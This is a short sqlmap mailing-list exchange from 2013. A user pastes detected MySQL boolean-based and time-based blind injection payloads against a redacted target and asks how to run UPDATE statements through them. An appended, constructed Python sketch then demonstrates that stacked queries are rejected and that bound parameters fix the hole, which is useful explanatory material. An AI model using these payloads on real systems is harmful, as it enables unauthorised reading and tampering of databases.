Hi.
It's very simple. If stacking of queries is not supported (e.g.
id=1;UPDATE..) then you can't use non-query SQL statements. Pretty simple.
Bye
On 18.2.2013 at 01:04, "Bruno Garcia" <garcia.bru...@gmail.com> wrote:
> Hello,
>
> I have this injection:
>
> Place: POST
> Parameter: xxxxx
> Type: boolean-based blind
> Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY
> clause (RLIKE)
> Payload: xxx=xxxx&xxxx=test' RLIKE IF(8894=8894,0x4d7953514c,0x28) AND
> 'qGgA'='qGgA
> Vector: RLIKE IF([INFERENCE],[ORIGVALUE],0x28)
>
> Type: AND/OR time-based blind
> Title: MySQL > 5.0.11 OR time-based blind
> Payload: tipo=xxxxx&xxxxx=-1188' OR 7506=SLEEP(5) AND 'lBGC'='lBGC
> Vector: OR [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
>
>
> and I get this when using UPDATE
>
> [WARNING] execution of custom SQL queries is only available when stacked
> queries are supported.
>
> Is there any workaround for this?
> Also, it shows that it detected two injections, and it's using the first
> one for doing the queries, is there any way I could test the queries with
> the second injection?
>
> Thanks
>
> ------------------------------------------------------------------------------
> The Go Parallel Website, sponsored by Intel - in partnership with Geeknet,
> is your hub for all things parallel software development, from weekly
> thought
> leadership blogs to news, videos, case studies, tutorials, tech docs,
> whitepapers, evaluation guides, and opinion stories. Check out the most
> recent posts - join the conversation now.
> http://goparallel.sourceforge.net/
> _______________________________________________
> sqlmap-users mailing list
> sqlmap-users@lists.sourceforge.net
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>
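
An added example, not part of the original thread and not sqlmap code: a Python sketch of why an injection inside a SELECT cannot run an UPDATE when the driver accepts one statement per call, and how binding the parameter removes the injection altogether. It assumes the standard-library sqlite3 module as a stand-in for the MySQL back end; the table, data and function names are constructed for illustration.

```python
import sqlite3

def make_db():
    """Constructed sample data for the demonstration."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, role TEXT)")
    db.executemany("INSERT INTO users (name, role) VALUES (?, ?)",
                   [("alice", "admin"), ("bob", "user")])
    db.commit()
    return db

def lookup_vulnerable(db, name):
    """Injectable: input is concatenated into a single SELECT."""
    sql = "SELECT id FROM users WHERE name = '" + name + "'"
    return db.execute(sql).fetchall()  # execute() accepts one statement only

def lookup_parameterized(db, name):
    """Hardened: input is bound as data and never parsed as SQL."""
    return db.execute("SELECT id FROM users WHERE name = ?", (name,)).fetchall()

def roles(db):
    """Current role column, used to confirm that no write took place."""
    return [r[0] for r in db.execute("SELECT role FROM users ORDER BY id")]

def demo():
    db = make_db()
    results = {}
    # A condition injected into the WHERE clause only changes what the SELECT returns.
    results["true_cond"] = len(lookup_vulnerable(db, "bob' AND '1'='1"))
    results["false_cond"] = len(lookup_vulnerable(db, "bob' AND '1'='2"))
    # A stacked statement is refused by the single-statement API, so nothing is written.
    try:
        lookup_vulnerable(db, "bob'; UPDATE users SET role='admin' WHERE name='bob")
        results["stacked"] = "executed"
    except (sqlite3.Warning, sqlite3.ProgrammingError):
        results["stacked"] = "rejected"
    results["roles_after"] = roles(db)
    # With a bound parameter the same input is just a name that matches no row.
    results["param"] = len(lookup_parameterized(db, "bob' AND '1'='1"))
    return results

if __name__ == "__main__":
    print(demo())
```

A single-statement driver limits the flaw to what the injected SELECT can read; it does not fix it. Only the parameterized form does.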